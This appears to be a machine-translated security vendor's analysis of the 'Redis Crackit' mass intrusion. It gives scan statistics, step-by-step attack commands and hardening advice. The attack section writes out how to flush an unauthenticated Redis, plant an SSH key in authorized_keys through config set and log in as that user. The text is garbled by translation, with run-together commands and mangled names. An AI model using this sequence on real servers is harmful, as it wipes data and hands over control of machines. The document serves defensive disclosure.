Redis Crackit Security Event Analysis

Event Description

November 9 Morning 10 multi-ox shield Cloud Security received several customer server security monitoring System alarm, found several system public key files were tampered with, followed by security incident analysis processing. During the analysis, we discovered the attack traces of a hacker organization using Redis design flaws. Given the simple but significant impact of the attack, we have made a further analysis of this security incident and found it to be a network-wide intrusion event for the global Internet. If Redis running on your Linux server does not have a password set, it is likely that this security event has been impacted. The result is that Redis data is lost and the server's SSH public key is replaced.

We scanned the global 6379-Port Redis server for this security incident, with the following results:

The total number of IP ports on the 6379 port of Redis that is open on the public network is 63,443. There are 43,024 IPs with no password authentication and 67% in total. The number of servers affected by the Redis Crackit event was found to be 35024, up 55% in the total, and about 81% for Redis with no password authentication.

cause of Event

Many users are the Redis download to the server directly run using, no ACL, no password, root run, and tied to the 0.0.0.0:6379, exposed to the public network. In the case of unauthorized access to Redis, an attacker can use the mechanism of Redis itself to write its own public key or other malicious program to the target server, allowing direct control of the target server.

Restore attack Process

Find a Redis service without authentication:

$ telnet192.168.1.11 6379

Trying192.168.1.11 ...

Connectedto192.168.1.11.

Escape character is ' ^] '.

echo "hey,noauth!"

$13

"Hey,noauth!"

Quit

+ok

Connection closed Byforeign host.

Make SSH keys and public keys:

$ ssh-keygen-t rsa-c "[Email protected]"

Generatingpublic/private Rsakey pair.

Enter file Inwhichtosave thekey (/HOME/ANTIREZ/.SSH/ID_RSA):./id_rsa

Enter passphrase (empty Forno passphrase):

Enter same Passphrase again:

Your identification has been saved In./id_rsa.

Yourpublic Keyhas been savedin./id_rsa.pub.

Thekeyfingerprintis:

F0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:[email protected]

Thekey ' s Randomart imageis:

+--[RSA2048]----+

| . 0+. |

| . o O.. O*o |

| = . + .+ . |

| o B o. |

| . o S E. |

| . o |

| |

| |

| |

+---------------------+

Write the public key content to foo.txt:

(echo-e "\ n"; Cat id_rsa.pub; echo-e "\ n") > Foo.txt

To write the SSH public key to Redis:

Redis-cli-h 192.168.1.11flushall

Cat Foo.txt | Redis-cli-h 192.168.1.11-xsetcrackit

Overwrite the original SSH public key of the system User:

192.168.1.11:6379>config Set dir/users/antirez/.ssh/

Ok

192.168.1.11:6379>config get dir

1) "Dir"

2) "/users/antirez/.ssh"

192.168.1.11:6379>config setdbfilename "Authorized_keys"

Ok

192.168.1.11:6379>save

Ok

Log in to the server via SSH:

$ ssh-i Id_rsa [email protected]

Enter passphrase Forkey ' Id_rsa ':

Last Login:mon Nov 2 15:58:43 from192.168.1.10

~?hostname

Salvatores-macbook-air.local

Patching Reinforcement Recommendations

1. Environmental safety:

• Can be tied to a loopback without the need for extranet access

• Need to add external ACL for network access control

• Can use tools such as Stunnel to complete data encryption transmission

2. Set a password for Redis

3. Create a separate Nologin system account to use for Redis services

4. Disable specific commands:

Rename-command CONFIG ""

Finally, I hope you can check the server to eliminate defects as soon as possible, any questions welcome to contact Mr Niu rejected cloud security technology Support Exchange (Enterprise QQ800109969), Mr Niu rejected cloud security will continue to charge in the security of the first front guard your site. Cloudxns users also need not worry, as long as the account in the Mr Niu rejected cloud Acceleration Website Login, you can enjoy their corresponding services.

Redis Crackit Security Event Analysis